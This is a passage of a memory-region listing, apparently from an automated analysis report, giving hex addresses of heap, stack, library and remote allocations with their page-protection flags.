page read and write
|
||
19961690000
|
heap
|
page execute and read and write
|
||
251017DD000
|
trusted library allocation
|
page read and write
|
||
25101536000
|
trusted library allocation
|
page read and write
|
||
11675CE000
|
stack
|
page read and write
|
||
25101ABB000
|
trusted library allocation
|
page read and write
|
||
1EB4B340000
|
heap
|
page read and write
|
||
23E1BCF0000
|
heap
|
page read and write
|
||
1C175150000
|
heap
|
page read and write
|
||
25101BF6000
|
trusted library allocation
|
page read and write
|
||
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
F6F8CFC000
|
stack
|
page read and write
|
||
7FFD344A0000
|
trusted library allocation
|
page read and write
|
||
2510188B000
|
trusted library allocation
|
page read and write
|
||
7FFD34660000
|
trusted library allocation
|
page execute and read and write
|
||
2866F675000
|
heap
|
page read and write
|
||
23E04306000
|
trusted library allocation
|
page read and write
|
||
25101AD7000
|
trusted library allocation
|
page read and write
|
||
25101BB5000
|
trusted library allocation
|
page read and write
|
||
25101408000
|
trusted library allocation
|
page read and write
|
||
1C101030000
|
trusted library allocation
|
page read and write
|
||
1EB4CDC0000
|
trusted library allocation
|
page read and write
|
||
7FFD348A0000
|
trusted library allocation
|
page execute and read and write
|
||
25101A3E000
|
trusted library allocation
|
page read and write
|
||
2510138C000
|
trusted library allocation
|
page read and write
|
||
5BBC97E000
|
stack
|
page read and write
|
||
7FFD344B4000
|
trusted library allocation
|
page read and write
|
||
2510180D000
|
trusted library allocation
|
page read and write
|
||
25101827000
|
trusted library allocation
|
page read and write
|
||
251013B1000
|
trusted library allocation
|
page read and write
|
||
25101801000
|
trusted library allocation
|
page read and write
|
||
2866FBE6000
|
heap
|
page read and write
|
||
1BDAE35E000
|
heap
|
page read and write
|
||
25101C15000
|
trusted library allocation
|
page read and write
|
||
25101A74000
|
trusted library allocation
|
page read and write
|
||
251016A1000
|
trusted library allocation
|
page read and write
|
||
3FC4E7E000
|
stack
|
page read and write
|
||
7FFD3449B000
|
trusted library allocation
|
page read and write
|
||
1BDAE1C0000
|
heap
|
page read and write
|
||
7FFD347D0000
|
trusted library allocation
|
page read and write
|
||
25101C57000
|
trusted library allocation
|
page read and write
|
||
25101954000
|
trusted library allocation
|
page read and write
|
||
2866F8BD000
|
heap
|
page read and write
|
||
28653670000
|
heap
|
page read and write
|
||
2F3C000
|
stack
|
page read and write
|
||
6C6E5FE000
|
stack
|
page read and write
|
||
25101BD1000
|
trusted library allocation
|
page read and write
|
||
3FC5E0E000
|
stack
|
page read and write
|
||
1ABE26DB000
|
trusted library allocation
|
page read and write
|
||
1BDAFF10000
|
heap
|
page read and write
|
||
251016A8000
|
trusted library allocation
|
page read and write
|
||
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
7FFD34690000
|
trusted library allocation
|
page read and write
|
||
251780E0000
|
heap
|
page read and write
|
||
7FFD34674000
|
trusted library allocation
|
page read and write
|
||
1C1102E6000
|
trusted library allocation
|
page read and write
|
||
7FFD3463A000
|
trusted library allocation
|
page read and write
|
||
5CC000
|
stack
|
page read and write
|
||
7FFD347D0000
|
trusted library allocation
|
page read and write
|
||
251018E0000
|
trusted library allocation
|
page read and write
|
||
2866D8EA000
|
heap
|
page read and write
|
||
7FFD34540000
|
trusted library allocation
|
page read and write
|
||
5BBCC78000
|
stack
|
page read and write
|
||
251018A4000
|
trusted library allocation
|
page read and write
|
||
25101BE6000
|
trusted library allocation
|
page read and write
|
||
1ABE0220000
|
trusted library allocation
|
page read and write
|
||
25101629000
|
trusted library allocation
|
page read and write
|
||
23E1BBD8000
|
heap
|
page read and write
|
||
25101B1F000
|
trusted library allocation
|
page read and write
|
||
5BBCAF9000
|
stack
|
page read and write
|
||
15ECE5AB000
|
heap
|
page read and write
|
||
25101A4E000
|
trusted library allocation
|
page read and write
|
||
7FFD34710000
|
trusted library allocation
|
page read and write
|
||
2866FB1F000
|
heap
|
page read and write
|
||
25101CCB000
|
trusted library allocation
|
page read and write
|
||
7DF4601F0000
|
trusted library allocation
|
page execute and read and write
|
||
1C110031000
|
trusted library allocation
|
page read and write
|
||
1EB4CE00000
|
heap
|
page readonly
|
||
251019E3000
|
trusted library allocation
|
page read and write
|
||
2510189A000
|
trusted library allocation
|
page read and write
|
||
1BDB161F000
|
trusted library allocation
|
page read and write
|
||
57E7B7E000
|
stack
|
page read and write
|
||
251014DE000
|
trusted library allocation
|
page read and write
|
||
3FC4DFE000
|
stack
|
page read and write
|
||
116647E000
|
stack
|
page read and write
|
||
1BDB16B8000
|
trusted library allocation
|
page read and write
|
||
25101BC5000
|
trusted library allocation
|
page read and write
|
||
25101748000
|
trusted library allocation
|
page read and write
|
||
23E03960000
|
trusted library allocation
|
page read and write
|
||
2510193F000
|
trusted library allocation
|
page read and write
|
||
251012B8000
|
trusted library allocation
|
page read and write
|
||
25101C1F000
|
trusted library allocation
|
page read and write
|
||
25101B18000
|
trusted library allocation
|
page read and write
|
||
251015E1000
|
trusted library allocation
|
page read and write
|
||
1ABE0180000
|
heap
|
page readonly
|
||
199798F8000
|
heap
|
page read and write
|
||
7FFD34680000
|
trusted library allocation
|
page execute and read and write
|
||
199611C0000
|
trusted library allocation
|
page read and write
|
||
251016DF000
|
trusted library allocation
|
page read and write
|
||
1EB653C4000
|
heap
|
page read and write
|
||
25101B0F000
|
trusted library allocation
|
page read and write
|
||
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
937C7BF000
|
stack
|
page read and write
|
||
1C177491000
|
heap
|
page read and write
|
||
251018C3000
|
trusted library allocation
|
page read and write
|
||
1ABE3902000
|
trusted library allocation
|
page read and write
|
||
7FFD344A0000
|
trusted library allocation
|
page read and write
|
||
1BDAE520000
|
trusted library allocation
|
page read and write
|
||
25101948000
|
trusted library allocation
|
page read and write
|
||
57E7FBE000
|
stack
|
page read and write
|
||
15ECE5A9000
|
heap
|
page read and write
|
||
1EB653E9000
|
heap
|
page read and write
|
||
7FFD34750000
|
trusted library allocation
|
page read and write
|
||
1BDB050F000
|
trusted library allocation
|
page read and write
|
||
28653690000
|
heap
|
page read and write
|
||
2510175B000
|
trusted library allocation
|
page read and write
|
||
251015A0000
|
trusted library allocation
|
page read and write
|
||
F5EDEFE000
|
stack
|
page read and write
|
||
1996178C000
|
trusted library allocation
|
page read and write
|
||
7FFD34870000
|
trusted library allocation
|
page read and write
|
||
1BDB1C3A000
|
trusted library allocation
|
page read and write
|
||
1995F6C0000
|
heap
|
page read and write
|
||
25101A8E000
|
trusted library allocation
|
page read and write
|
||
1166164000
|
stack
|
page read and write
|
||
25101BA7000
|
trusted library allocation
|
page read and write
|
||
19961DF1000
|
trusted library allocation
|
page read and write
|
||
25101C02000
|
trusted library allocation
|
page read and write
|
||
1BDBFF21000
|
trusted library allocation
|
page read and write
|
||
1995F826000
|
heap
|
page read and write
|
||
1ABF1B4D000
|
trusted library allocation
|
page read and write
|
||
1EB4B479000
|
heap
|
page read and write
|
||
7FFD34750000
|
trusted library allocation
|
page read and write
|
||
1ABE3305000
|
trusted library allocation
|
page read and write
|
||
25101C26000
|
trusted library allocation
|
page read and write
|
||
2510196E000
|
trusted library allocation
|
page read and write
|
||
25101699000
|
trusted library allocation
|
page read and write
|
||
7FFD34540000
|
trusted library allocation
|
page execute and read and write
|
||
4919BFE000
|
stack
|
page read and write
|
||
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
25178630000
|
heap
|
page read and write
|
||
7FFD346A0000
|
trusted library allocation
|
page read and write
|
||
15ECE599000
|
heap
|
page read and write
|
||
7FFD34710000
|
trusted library allocation
|
page read and write
|
||
6C6EEFE000
|
stack
|
page read and write
|
||
25101503000
|
trusted library allocation
|
page read and write
|
||
1EB4DA16000
|
trusted library allocation
|
page read and write
|
||
5BBD9CC000
|
stack
|
page read and write
|
||
7FFD346E0000
|
trusted library allocation
|
page read and write
|
||
19961700000
|
heap
|
page execute and read and write
|
||
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
7FFD346B0000
|
trusted library allocation
|
page read and write
|
||
251016E4000
|
trusted library allocation
|
page read and write
|
||
1ABE007D000
|
heap
|
page read and write
|
||
1C100001000
|
trusted library allocation
|
page read and write
|
||
1C101062000
|
trusted library allocation
|
page read and write
|
||
5BBDACC000
|
stack
|
page read and write
|
||
F6F8B3E000
|
unkown
|
page read and write
|
||
15EB7DDA000
|
trusted library allocation
|
page read and write
|
||
1BDC83BA000
|
heap
|
page read and write
|
||
25100751000
|
trusted library allocation
|
page read and write
|
||
23E03EF4000
|
trusted library allocation
|
page read and write
|
||
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
7FFD34680000
|
trusted library allocation
|
page read and write
|
||
7FFD34484000
|
trusted library allocation
|
page read and write
|
||
7FFD34771000
|
trusted library allocation
|
page read and write
|
||
25101BE2000
|
trusted library allocation
|
page read and write
|
||
7FFD347D0000
|
trusted library allocation
|
page read and write
|
||
25178610000
|
heap
|
page execute and read and write
|
||
25101C36000
|
trusted library allocation
|
page read and write
|
||
1BDAE36D000
|
heap
|
page read and write
|
||
25101970000
|
trusted library allocation
|
page read and write
|
||
23E03A00000
|
heap
|
page execute and read and write
|
||
2510163F000
|
trusted library allocation
|
page read and write
|
||
937BFFE000
|
stack
|
page read and write
|
||
25101750000
|
trusted library allocation
|
page read and write
|
||
25178580000
|
heap
|
page readonly
|
||
25101714000
|
trusted library allocation
|
page read and write
|
||
1C177450000
|
heap
|
page read and write
|
||
251017C1000
|
trusted library allocation
|
page read and write
|
||
23E1BE70000
|
heap
|
page read and write
|
||
1BDB169B000
|
trusted library allocation
|
page read and write
|
||
251017ED000
|
trusted library allocation
|
page read and write
|
||
1995F790000
|
heap
|
page read and write
|
||
25101B12000
|
trusted library allocation
|
page read and write
|
||
7FFD34662000
|
trusted library allocation
|
page read and write
|
||
25101213000
|
trusted library allocation
|
page read and write
|
||
1BDB04D8000
|
trusted library allocation
|
page read and write
|
||
10E0000
|
heap
|
page read and write
|
||
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
478000
|
remote allocation
|
page execute and read and write
|
||
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
1BDB1A11000
|
trusted library allocation
|
page read and write
|
||
2510173E000
|
trusted library allocation
|
page read and write
|
||
1BDAFF21000
|
trusted library allocation
|
page read and write
|
||
2866FA84000
|
heap
|
page read and write
|
||
7FFD348B0000
|
trusted library allocation
|
page read and write
|
||
25101A8A000
|
trusted library allocation
|
page read and write
|
||
4919D3E000
|
stack
|
page read and write
|
||
23E13A79000
|
trusted library allocation
|
page read and write
|
||
57E7F3E000
|
stack
|
page read and write
|
||
2A90000
|
heap
|
page read and write
|
||
2510198C000
|
trusted library allocation
|
page read and write
|
||
251019AA000
|
trusted library allocation
|
page read and write
|
||
6C6EA7D000
|
stack
|
page read and write
|
||
F6F8C7E000
|
stack
|
page read and write
|
||
251018DA000
|
trusted library allocation
|
page read and write
|
||
25101BB0000
|
trusted library allocation
|
page read and write
|
||
25101AAE000
|
trusted library allocation
|
page read and write
|
||
15EB45A0000
|
heap
|
page read and write
|
||
7FFD34710000
|
trusted library allocation
|
page read and write
|
||
25178A45000
|
heap
|
page read and write
|
||
251012AE000
|
trusted library allocation
|
page read and write
|
||
251017C3000
|
trusted library allocation
|
page read and write
|
||
1EB4B4BC000
|
heap
|
page read and write
|
||
23E1BE34000
|
heap
|
page read and write
|
||
1C176D6C000
|
heap
|
page read and write
|
||
251014F9000
|
trusted library allocation
|
page read and write
|
||
1ABE2853000
|
trusted library allocation
|
page read and write
|
||
57E7DB9000
|
stack
|
page read and write
|
||
7FFD346B0000
|
trusted library allocation
|
page read and write
|
||
7FFD34710000
|
trusted library allocation
|
page read and write
|
||
1BDAE365000
|
heap
|
page read and write
|
||
15EB5EC0000
|
trusted library allocation
|
page read and write
|
||
1C1102F4000
|
trusted library allocation
|
page read and write
|
||
1166B3E000
|
stack
|
page read and write
|
||
1C100C46000
|
trusted library allocation
|
page read and write
|
||
2510178A000
|
trusted library allocation
|
page read and write
|
||
25101CC1000
|
trusted library allocation
|
page read and write
|
||
2510190C000
|
trusted library allocation
|
page read and write
|
||
7FFD346E0000
|
trusted library allocation
|
page read and write
|
||
7FFD34530000
|
trusted library allocation
|
page read and write
|
||
7FFD34664000
|
trusted library allocation
|
page read and write
|
||
1ABFA3CE000
|
heap
|
page read and write
|
||
2866FB3D000
|
heap
|
page read and write
|
||
251017C9000
|
trusted library allocation
|
page read and write
|
||
2510162B000
|
trusted library allocation
|
page read and write
|
||
25101599000
|
trusted library allocation
|
page read and write
|
||
7FFD34632000
|
trusted library allocation
|
page read and write
|
||
7FFD34483000
|
trusted library allocation
|
page execute and read and write
|
||
F6F91BE000
|
stack
|
page read and write
|
||
7FFD346E0000
|
trusted library allocation
|
page read and write
|
||
25101CCF000
|
trusted library allocation
|
page read and write
|
||
23E019F0000
|
heap
|
page read and write
|
||
1C1752B6000
|
heap
|
page read and write
|
||
1BDB1988000
|
trusted library allocation
|
page read and write
|
||
2866F625000
|
heap
|
page read and write
|
||
25101B6D000
|
trusted library allocation
|
page read and write
|
||
15EB5FB0000
|
heap
|
page execute and read and write
|
||
1EB4B384000
|
heap
|
page read and write
|
||
7FFD344DC000
|
trusted library allocation
|
page execute and read and write
|
||
1ABE0260000
|
heap
|
page read and write
|
||
6C6ECF7000
|
stack
|
page read and write
|
||
7DF443CC0000
|
trusted library allocation
|
page execute and read and write
|
||
251015CA000
|
trusted library allocation
|
page read and write
|
||
7FFD344A0000
|
trusted library allocation
|
page read and write
|
||
25101669000
|
trusted library allocation
|
page read and write
|
||
2510155A000
|
trusted library allocation
|
page read and write
|
||
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
7FFD34566000
|
trusted library allocation
|
page execute and read and write
|
||
1BDAE363000
|
heap
|
page read and write
|
||
2866F6DE000
|
heap
|
page read and write
|
||
116683E000
|
stack
|
page read and write
|
||
25101451000
|
trusted library allocation
|
page read and write
|
||
7FFD34650000
|
trusted library allocation
|
page read and write
|
||
1EB4DBD5000
|
trusted library allocation
|
page read and write
|
||
25101990000
|
trusted library allocation
|
page read and write
|
||
7FFD34540000
|
trusted library allocation
|
page read and write
|
||
1BDB1932000
|
trusted library allocation
|
page read and write
|
||
251016FD000
|
trusted library allocation
|
page read and write
|
||
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
1995F886000
|
heap
|
page read and write
|
||
25101BDB000
|
trusted library allocation
|
page read and write
|
||
25101AA9000
|
trusted library allocation
|
page read and write
|
||
1ABDFED0000
|
heap
|
page read and write
|
||
1C110304000
|
trusted library allocation
|
page read and write
|
||
7FFD34650000
|
trusted library allocation
|
page execute and read and write
|
||
251016CA000
|
trusted library allocation
|
page read and write
|
||
7FFD34630000
|
trusted library allocation
|
page read and write
|
||
6C6EE7E000
|
stack
|
page read and write
|
||
1C101304000
|
trusted library allocation
|
page read and write
|
||
25101C68000
|
trusted library allocation
|
page read and write
|
||
25101B87000
|
trusted library allocation
|
page read and write
|
||
25101BF2000
|
trusted library allocation
|
page read and write
|
||
2510191B000
|
trusted library allocation
|
page read and write
|
||
7FFD34690000
|
trusted library allocation
|
page read and write
|
||
1C175200000
|
trusted library allocation
|
page read and write
|
||
7FFD346D0000
|
trusted library allocation
|
page read and write
|
||
19971711000
|
trusted library allocation
|
page read and write
|
||
1BDB04AA000
|
trusted library allocation
|
page read and write
|
||
2510161E000
|
trusted library allocation
|
page read and write
|
||
1EB65448000
|
heap
|
page read and write
|
||
25101985000
|
trusted library allocation
|
page read and write
|
||
BE7B15D000
|
stack
|
page read and write
|
||
15EB63D4000
|
trusted library allocation
|
page read and write
|
||
251017D9000
|
trusted library allocation
|
page read and write
|
||
2866F856000
|
heap
|
page read and write
|
||
1ABE0264000
|
heap
|
page read and write
|
||
1EB657AF000
|
heap
|
page read and write
|
||
7FFD346E0000
|
trusted library allocation
|
page read and write
|
||
29B57250000
|
heap
|
page read and write
|
||
251018AC000
|
trusted library allocation
|
page read and write
|
||
25101497000
|
trusted library allocation
|
page read and write
|
||
25178A5C000
|
heap
|
page read and write
|
||
2866FBE6000
|
heap
|
page read and write
|
||
2866D830000
|
heap
|
page read and write
|
||
11661EF000
|
stack
|
page read and write
|
||
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
1ABE1AE1000
|
trusted library allocation
|
page read and write
|
||
15ECE779000
|
heap
|
page read and write
|
||
25101CB5000
|
trusted library allocation
|
page read and write
|
||
251019ED000
|
trusted library allocation
|
page read and write
|
||
6C6EDFE000
|
stack
|
page read and write
|
||
19961210000
|
heap
|
page read and write
|
||
1EB65630000
|
heap
|
page read and write
|
||
25178570000
|
trusted library allocation
|
page read and write
|
||
7FFD34670000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
1ABE38B8000
|
trusted library allocation
|
page read and write
|
||
7FFD346B0000
|
trusted library allocation
|
page read and write
|
||
25178857000
|
heap
|
page execute and read and write
|
||
251013F5000
|
trusted library allocation
|
page read and write
|
||
1C17749D000
|
heap
|
page read and write
|
||
1EB4B458000
|
heap
|
page read and write
|
||
29B57420000
|
heap
|
page read and write
|
||
57E78FE000
|
stack
|
page read and write
|
||
1ABFA2DB000
|
heap
|
page read and write
|
||
251018BB000
|
trusted library allocation
|
page read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
23E03F41000
|
trusted library allocation
|
page read and write
|
||
25101932000
|
trusted library allocation
|
page read and write
|
||
15EB5ED0000
|
heap
|
page readonly
|
||
251017F7000
|
trusted library allocation
|
page read and write
|
||
1995F823000
|
heap
|
page read and write
|
||
1BDC8535000
|
heap
|
page read and write
|
||
7FFD34493000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34566000
|
trusted library allocation
|
page read and write
|
||
25101AD2000
|
trusted library allocation
|
page read and write
|
||
251019F8000
|
trusted library allocation
|
page read and write
|
||
251012F8000
|
trusted library allocation
|
page read and write
|
||
7FFD3463A000
|
trusted library allocation
|
page read and write
|
||
7FFD34493000
|
trusted library allocation
|
page execute and read and write
|
||
25101AE4000
|
trusted library allocation
|
page read and write
|
||
25101974000
|
trusted library allocation
|
page read and write
|
||
19979855000
|
heap
|
page read and write
|
||
2866F8F5000
|
heap
|
page read and write
|
||
2866D94E000
|
heap
|
page read and write
|
||
7FFD34710000
|
trusted library allocation
|
page read and write
|
||
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
FDBFAFD000
|
stack
|
page read and write
|
||
2866F885000
|
heap
|
page read and write
|
||
1C1752B4000
|
heap
|
page read and write
|
||
1EB4B3D8000
|
heap
|
page read and write
|
||
3FC4EFB000
|
stack
|
page read and write
|
||
2510174A000
|
trusted library allocation
|
page read and write
|
||
7FFD34750000
|
trusted library allocation
|
page read and write
|
||
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
1ABF1D60000
|
trusted library allocation
|
page read and write
|
||
25101344000
|
trusted library allocation
|
page read and write
|
||
25101972000
|
trusted library allocation
|
page read and write
|
||
251018DE000
|
trusted library allocation
|
page read and write
|
||
25101A10000
|
trusted library allocation
|
page read and write
|
||
7FFD34670000
|
trusted library allocation
|
page execute and read and write
|
||
2866F689000
|
heap
|
page read and write
|
||
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
3FC4C7F000
|
stack
|
page read and write
|
||
1BDC850F000
|
heap
|
page read and write
|
||
25101CAB000
|
trusted library allocation
|
page read and write
|
||
7FFD3449D000
|
trusted library allocation
|
page execute and read and write
|
||
25101331000
|
trusted library allocation
|
page read and write
|
||
3FC5079000
|
stack
|
page read and write
|
||
1ABFA070000
|
heap
|
page execute and read and write
|
||
1BDAE333000
|
heap
|
page read and write
|
||
1BDC0868000
|
trusted library allocation
|
page read and write
|
||
1C177440000
|
heap
|
page read and write
|
||
1ABFA3C4000
|
heap
|
page read and write
|
||
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
251019D5000
|
trusted library allocation
|
page read and write
|
||
25101B9C000
|
trusted library allocation
|
page read and write
|
||
2866D948000
|
heap
|
page read and write
|
||
116677D000
|
stack
|
page read and write
|
||
25101889000
|
trusted library allocation
|
page read and write
|
||
7FFD3454C000
|
trusted library allocation
|
page execute and read and write
|
||
1EB4D61F000
|
trusted library allocation
|
page read and write
|
||
2866D808000
|
heap
|
page read and write
|
||
251016AC000
|
trusted library allocation
|
page read and write
|
||
7FFD347E0000
|
trusted library allocation
|
page read and write
|
||
1ABE3344000
|
trusted library allocation
|
page read and write
|
||
25101782000
|
trusted library allocation
|
page read and write
|
||
251013A9000
|
trusted library allocation
|
page read and write
|
||
25178795000
|
heap
|
page read and write
|
||
251018ED000
|
trusted library allocation
|
page read and write
|
||
25178A56000
|
heap
|
page read and write
|
||
2866F884000
|
heap
|
page read and write
|
||
2866F856000
|
heap
|
page read and write
|
||
251789A0000
|
heap
|
page read and write
|
||
57E7BFD000
|
stack
|
page read and write
|
||
25101A5D000
|
trusted library allocation
|
page read and write
|
||
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
25101CBC000
|
trusted library allocation
|
page read and write
|
||
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
25101C49000
|
trusted library allocation
|
page read and write
|
||
25101156000
|
trusted library allocation
|
page read and write
|
||
1ABE1AD0000
|
heap
|
page read and write
|
||
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
2866D800000
|
heap
|
page read and write
|
||
7FFD34810000
|
trusted library allocation
|
page read and write
|
||
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
7FFD34650000
|
trusted library allocation
|
page execute and read and write
|
||
1BDC83CE000
|
heap
|
page read and write
|
||
25101676000
|
trusted library allocation
|
page read and write
|
||
15ECE680000
|
heap
|
page read and write
|
||
7FFD34650000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34678000
|
trusted library allocation
|
page read and write
|
||
7FFD346A0000
|
trusted library allocation
|
page read and write
|
||
15EB5F13000
|
trusted library allocation
|
page read and write
|
||
19961600000
|
heap
|
page read and write
|
||
15ECEAA0000
|
heap
|
page read and write
|
||
2866D8D3000
|
heap
|
page read and write
|
||
1EB4D000000
|
heap
|
page read and write
|
||
1BDB04CC000
|
trusted library allocation
|
page read and write
|
||
7FFD347E0000
|
trusted library allocation
|
page read and write
|
||
7FFD34560000
|
trusted library allocation
|
page read and write
|
||
25101815000
|
trusted library allocation
|
page read and write
|
||
BE7B4FF000
|
unkown
|
page read and write
|
||
25101963000
|
trusted library allocation
|
page read and write
|
||
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
7FFD344AB000
|
trusted library allocation
|
page read and write
|
||
1995F798000
|
heap
|
page read and write
|
||
7FFD34870000
|
trusted library allocation
|
page read and write
|
||
15EB45E7000
|
heap
|
page read and write
|
||
25101A5B000
|
trusted library allocation
|
page read and write
|
||
25178850000
|
heap
|
page execute and read and write
|
||
25101C91000
|
trusted library allocation
|
page read and write
|
||
7FFD34576000
|
trusted library allocation
|
page execute and read and write
|
||
15EB5F50000
|
trusted library allocation
|
page read and write
|
||
7FFD347B0000
|
trusted library allocation
|
page execute and read and write
|
||
25101C7B000
|
trusted library allocation
|
page read and write
|
||
251014BB000
|
trusted library allocation
|
page read and write
|
||
23E01ABE000
|
heap
|
page read and write
|
||
F5EE3FC000
|
stack
|
page read and write
|
||
251016DB000
|
trusted library allocation
|
page read and write
|
||
251014E8000
|
trusted library allocation
|
page read and write
|
||
7FFD34640000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD346C0000
|
trusted library allocation
|
page read and write
|
||
1BDC8390000
|
heap
|
page read and write
|
||
199621B2000
|
trusted library allocation
|
page read and write
|
||
25101712000
|
trusted library allocation
|
page read and write
|
||
251780C0000
|
heap
|
page read and write
|
||
BE7B5FF000
|
stack
|
page read and write
|
||
2510170C000
|
trusted library allocation
|
page read and write
|
||
2510168C000
|
trusted library allocation
|
page read and write
|
||
15EB4626000
|
heap
|
page read and write
|
||
1BDB0508000
|
trusted library allocation
|
page read and write
|
||
7FFD34493000
|
trusted library allocation
|
page execute and read and write
|
||
1ABE0086000
|
heap
|
page read and write
|
||
1BDAE574000
|
heap
|
page read and write
|
||
251016EE000
|
trusted library allocation
|
page read and write
|
||
1BDB1B75000
|
trusted library allocation
|
page read and write
|
||
7FFD3448D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
25101A50000
|
trusted library allocation
|
page read and write
|
||
251016C4000
|
trusted library allocation
|
page read and write
|
||
2510190A000
|
trusted library allocation
|
page read and write
|
||
2510158B000
|
trusted library allocation
|
page read and write
|
||
251019BB000
|
trusted library allocation
|
page read and write
|
||
7FFD34640000
|
trusted library allocation
|
page execute and read and write
|
||
25101868000
|
trusted library allocation
|
page read and write
|
||
7FFD348DD000
|
trusted library allocation
|
page read and write
|
||
25101C47000
|
trusted library allocation
|
page read and write
|
||
98B000
|
heap
|
page read and write
|
||
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
1BDB04F9000
|
trusted library allocation
|
page read and write
|
||
1C10007D000
|
trusted library allocation
|
page read and write
|
||
4919E3C000
|
stack
|
page read and write
|
||
474000
|
remote allocation
|
page execute and read and write
|
||
1C1102EB000
|
trusted library allocation
|
page read and write
|
||
4919A7E000
|
stack
|
page read and write
|
||
7FFD34800000
|
trusted library allocation
|
page read and write
|
||
7FFD34680000
|
trusted library allocation
|
page execute and read and write
|
||
251012BF000
|
trusted library allocation
|
page read and write
|
||
1BDB0502000
|
trusted library allocation
|
page read and write
|
||
7FFD345B0000
|
trusted library allocation
|
page execute and read and write
|
||
F6F92BE000
|
stack
|
page read and write
|
||
25101904000
|
trusted library allocation
|
page read and write
|
||
251767EA000
|
heap
|
page read and write
|
||
29B57440000
|
heap
|
page read and write
|
||
1BDB0F0F000
|
trusted library allocation
|
page read and write
|
||
23E1BE12000
|
heap
|
page read and write
|
||
15EB4550000
|
heap
|
page read and write
|
||
57E7E38000
|
stack
|
page read and write
|
||
251013A0000
|
trusted library allocation
|
page read and write
|
||
25101784000
|
trusted library allocation
|
page read and write
|
||
25101A17000
|
trusted library allocation
|
page read and write
|
||
937C27E000
|
stack
|
page read and write
|
||
2510176B000
|
trusted library allocation
|
page read and write
|
||
25101538000
|
trusted library allocation
|
page read and write
|
||
1EB4CE20000
|
heap
|
page read and write
|
||
2510150F000
|
trusted library allocation
|
page read and write
|
||
7FFD346A0000
|
trusted library allocation
|
page read and write
|
||
7FFD34672000
|
trusted library allocation
|
page read and write
|
||
7FFD3463A000
|
trusted library allocation
|
page read and write
|
||
2866FBE6000
|
heap
|
page read and write
|
||
25101576000
|
trusted library allocation
|
page read and write
|
||
25101C0C000
|
trusted library allocation
|
page read and write
|
||
251018A6000
|
trusted library allocation
|
page read and write
|
||
15ECE765000
|
heap
|
page read and write
|
||
251016F9000
|
trusted library allocation
|
page read and write
|
||
251009D5000
|
trusted library allocation
|
page read and write
|
||
5BBCEFB000
|
stack
|
page read and write
|
||
2866D94E000
|
heap
|
page read and write
|
||
251015BA000
|
trusted library allocation
|
page read and write
|
||
25101873000
|
trusted library allocation
|
page read and write
|
||
2510139D000
|
trusted library allocation
|
page read and write
|
||
1C1775DE000
|
heap
|
page read and write
|
||
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
F5EE1FE000
|
stack
|
page read and write
|
||
23E1BC1C000
|
heap
|
page read and write
|
||
25101368000
|
trusted library allocation
|
page read and write
|
||
1ABFA122000
|
heap
|
page read and write
|
||
1BDB1327000
|
trusted library allocation
|
page read and write
|
||
1C177370000
|
trusted library allocation
|
page read and write
|
||
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
7FFD345A0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
1EB6579F000
|
heap
|
page read and write
|
||
937D58E000
|
stack
|
page read and write
|
||
2510123B000
|
trusted library allocation
|
page read and write
|
||
25101A36000
|
trusted library allocation
|
page read and write
|
||
2866F910000
|
heap
|
page read and write
|
||
2866F6E1000
|
heap
|
page read and write
|
||
251017E1000
|
trusted library allocation
|
page read and write
|
||
2866F673000
|
heap
|
page read and write
|
||
15EB7A05000
|
trusted library allocation
|
page read and write
|
||
23E03A06000
|
heap
|
page execute and read and write
|
||
1ABFA2D8000
|
heap
|
page read and write
|
||
4919FBF000
|
stack
|
page read and write
|
||
25101B06000
|
trusted library allocation
|
page read and write
|
||
2866F865000
|
heap
|
page read and write
|
||
937C5B6000
|
stack
|
page read and write
|
||
7FFD347C3000
|
trusted library allocation
|
page read and write
|
||
25101AD4000
|
trusted library allocation
|
page read and write
|
||
1BDC8580000
|
heap
|
page read and write
|
||
7FFD34490000
|
trusted library allocation
|
page read and write
|
||
1ABE1D02000
|
trusted library allocation
|
page read and write
|
||
1EB5D351000
|
trusted library allocation
|
page read and write
|
||
25101347000
|
trusted library allocation
|
page read and write
|
||
3FC4FFD000
|
stack
|
page read and write
|
||
1C17527E000
|
heap
|
page read and write
|
||
251016FF000
|
trusted library allocation
|
page read and write
|
||
9F0000
|
heap
|
page read and write
|
||
25101710000
|
trusted library allocation
|
page read and write
|
||
7FFD34596000
|
trusted library allocation
|
page execute and read and write
|
||
1BDAE3A5000
|
heap
|
page read and write
|
||
2866F5F3000
|
heap
|
page read and write
|
||
251018D2000
|
trusted library allocation
|
page read and write
|
||
251019CB000
|
trusted library allocation
|
page read and write
|
||
251014C5000
|
trusted library allocation
|
page read and write
|
||
286536E4000
|
heap
|
page read and write
|
||
7FFD34670000
|
trusted library allocation
|
page execute and read and write
|
||
25101A7F000
|
trusted library allocation
|
page read and write
|
||
25178784000
|
heap
|
page read and write
|
||
251017EB000
|
trusted library allocation
|
page read and write
|
||
19971721000
|
trusted library allocation
